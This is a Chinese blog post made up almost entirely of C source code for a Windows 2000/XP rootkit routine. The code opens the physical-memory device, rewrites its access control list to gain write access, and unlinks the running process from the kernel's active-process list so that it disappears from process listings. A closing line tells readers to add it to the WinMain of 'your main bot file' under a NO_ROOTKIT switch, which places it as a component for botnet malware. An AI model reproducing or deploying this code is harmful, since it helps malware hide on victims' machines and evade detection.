隐藏进程代码[C语言]

最新推荐文章于 2024-02-05 14:00:00 发布
最新推荐文章于 2024-02-05 14:00:00 发布
阅读量2.3k 收藏 2
点赞数
分类专栏: c++ 文章标签: 语言 c attributes null pointers access

//HideProcess.h

#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>

//#include/"HideProcess.h/"

#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);


BOOL InitNTDLL();
VOID CloseNTDLL();
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
HANDLE OpenPhysicalMemory();
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
ULONG GetData(PVOID addr);
BOOL SetData(PVOID addr,ULONG data);
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);
BOOL YHideProcess();
BOOL HideProcess();



RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary(/"ntdll.dll/");

if (NULL == g_hNtDLL)
return FALSE;

RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,

/"RtlInitUnicodeString/");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, /"ZwOpenSection/");

return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
if(NULL != g_hNtDLL)
FreeLibrary(g_hNtDLL);

g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;

DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,
NULL, &pDacl, NULL, &pSD);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = /"CURRENT_USER/";

dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo

(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

}
//---------------------------------------------------------------------------


HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;

g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);

if (5 != g_osvi.dwMajorVersion)
return NULL;

switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
}

RtlInitUnicodeString(&physmemString, L/"DevicePhysicalMemory/");

attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;

status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}

if(!NT_SUCCESS(status))
return NULL;

g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

0x1000);

if( g_pMapPhysicalMemory == NULL )
return NULL;

return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
PGDE = BaseAddress[VAddr>>22];

if (0 == (PGDE&1))
return 0;

ULONG tmp = PGDE & 0x00000080;

if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];

if (0 == (PTE&1))
return 0;

PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}

return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

0xfffff000, 0x1000);

if (0 == tmp)
return 0;

ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);

return ret;
}
//---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

if (0 == tmp)
return FALSE;

tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);

return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1 ;
}
//---------------------------------------------------------------------------
BOOL YHideProcess()
{
// SetUnhandledExceptionFilter(exeception);

if (FALSE == InitNTDLL())
return FALSE;

if (0 == OpenPhysicalMemory())
return FALSE;

ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
ULONG process = GetData((PVOID)(thread + 0x44)); //kpeb

ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
fw = GetData((PVOID)(process + 0xa0));
bw = GetData((PVOID)(process + 0xa4));
}

if (1 == g_osvi.dwMinorVersion)
{
fw = GetData((PVOID)(process + 0x88));
bw = GetData((PVOID)(process + 0x8c));
}

SetData((PVOID)(fw + 4), bw);
SetData((PVOID)(bw), fw);

CloseHandle(g_hMPM);
CloseNTDLL();

return TRUE;
}

BOOL HideProcess()
{
static BOOL b_hide = FALSE;
if (!b_hide)
{
b_hide = TRUE;
YHideProcess();
return TRUE;
}
return TRUE;
}


Save the above as a header file call it hideproc.h if you wish go to your main bot file and add the following command inside /"WinMain/"
Code:

#ifndef NO_ROOTKIT
HideProc()
#endif

tix66
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c语言实现进程隐藏和保护,C/C++程序开发中实现信息隐藏的三种类型
weixin_42502643的博客
05-21 1040
无论是模块化设计,还是面向对象设计,还是分层设计,实现子系统内部信息的对外隐藏都是最关键的内在要求。以本人浅显的经验,把信息隐藏按照程度的不同分成(1)不可见不可用(2)可见不可用(3)可见可用。1 不可见不可用就是说模块内部的变量、结构体、类定义对外部而已完全隐藏,外部对此一无所知。常用的实现方法就是利用不透明指针,请参见我的博文C语言开发函数库时利用不透明指针对外隐藏结构体细节。这种方法同样适...
C语言----隐藏代码文件
m0_55065718的博客
01-13 1490
VS--C--静态库技巧
C语言进程隐藏NTOpenprocess,抛砖引玉,谈谈VB下的隐藏进程检测
weixin_31684041的博客
05-23 276
PAGE:0049D59E;NTSTATUS__stdcallNtOpenProcess(PHANDLEProcessHandle,ACCESS_MASKDesiredAccess,POBJECT_ATTRIBUTESObjectAttributes,PCLIENT_IDClientId)PAGE:0049D59EpublicNtOpenPro...
教你如何隐藏自己的代码
最新发布
2301_80417557的博客
02-05 1383
当我们想将自己的程序卖出去时,如果我们不会隐藏自己的代码,一份程序只能卖出一次,但当我们学会隐藏自己的代码后,我们就可以将一份代码卖出两份的钱(原代码隐藏后的代码
隐藏进程命令行参数,例如输入密码等高危操作
janbar的博客
01-23 1801
目录前言复写argv参数获取标准输入总结前言 启动程序很多时候用命令行参数可以很方便,做到简化一些配置,但是输入用户名密码等操作,如果通过进程查看工具直接看到密码就太不安全了。 因此很有必要研究如何隐藏命令行参数中的某些字段,当然做成配置文件也是极好的,但是无疑给运行程序增加额外操作。编辑保存配置文件也会费点事。 我结合网上找到的一些方案,以及自己总结一个方案,记下笔记。 复写argv参数 ...
c程序隐藏linux,linux 下隐藏进程的一种方法
weixin_35598854的博客
05-05 181
前言思路就是利用 LD_PRELOAD 来实现系统函数的劫持LD_PRELOAD是什么:LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函...
win10驱动断链隐藏进程源码
03-02
搭建好vs2019驱动环境,更改好配置,添加进源码,源码内修改好要隐藏进程ID后可直接编译,用驱动加载工具加载就可以隐藏,我测试的15版本的不用签名,此源码仅供学习参考。
c语言隐藏进程源码,进程保护之-进程隐藏(原创, ASM实现)
weixin_28025327的博客
05-22 1031
该楼层疑似违规已被系统折叠隐藏此楼查看此楼最近看到一个关于"进程保护"的问题,无聊就研究了一下,总共得出了2种比较可行的方法,第一种就是进程隐藏,第2种就是进程守护.代码发出来,希望大家可以互相学习......进程守护:http://hi.baidu.com/ciw%5Fblue/blog/item/edd5ff457062603b869473a1.html进程隐藏:http://hi.baid...
实现进程隐藏(完整源代码
To be, or not to be: that is the question
01-07 2672
Normal 0 7.8 磅 0 2 false false false MicrosoftInternetExplorer4 <object class
Rootkit---进程隐藏
q759451733的博客
04-16 4983
进程隐藏
语言隐藏所有进程模块源码
06-02
语言隐藏所有进程模块源码。@易语言在线学习。
隐藏进程代码
06-03
隐藏进程代码,通过驱动隐藏进程或文件.c++代码,可编译通过.
隐藏进程 C语言
11-06
c语言实现隐藏进程 很不错的代码 调试可以运行
若干vc代码1352.rar
06-13
2012-06-13 13:11 26,323 隐藏进程.rar 2011-03-15 22:51 27,510 人品测试.exe 2012-06-13 13:37 41,984 熊猫烧香病毒源代码.doc 2012-06-13 13:11 42,760 系统监视工具.rar 2012-06-13 12:49 50,422 系统强力优化...
SuperPid修改进程PID工具驱动级.别名.SP伪装进程工具
07-02
SuperPid修改进程PID工具界面是VB些的,底层驱动是C语言写的。作者提供源代码,可惜源代码要180元....如今先拿他的成品软件用用 。还有次工具 别名为 "SP伪装进程"。说白了和 他之前的SuperHide差不多,只是SuperPid...
Java开发技术大全(500个源代码).
12-02
代码范例列表 第1章 示例描述:本章演示如何开始使用JDK进行程序的开发。 HelloWorldApp.java 第一个用Java开发的应用程序。 firstApplet.java 第一个用Java开发的Applet小程序。 firstApplet.htm 用来装载...
自己动手写操作系统(含源代码).part2
10-18
书中不仅关注代码本身,同时关注完成这些代码的思路和过程。本书不同于其他的理论型书籍,而是提供给读者一个动手实践的路线图。读者可以根据路线图逐步完成各部分的功能,从而避免了一开始就面对整个操作系统数万行...
进程调度实验代码c语言
10-22
下面是一个简单的进程调度实验代码C语言示例: ```c #include #include // 进程结构体 typedef struct { int process_id; // 进程ID int burst_time; // 执行时间 int priority; // 优先级 } Process; // ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值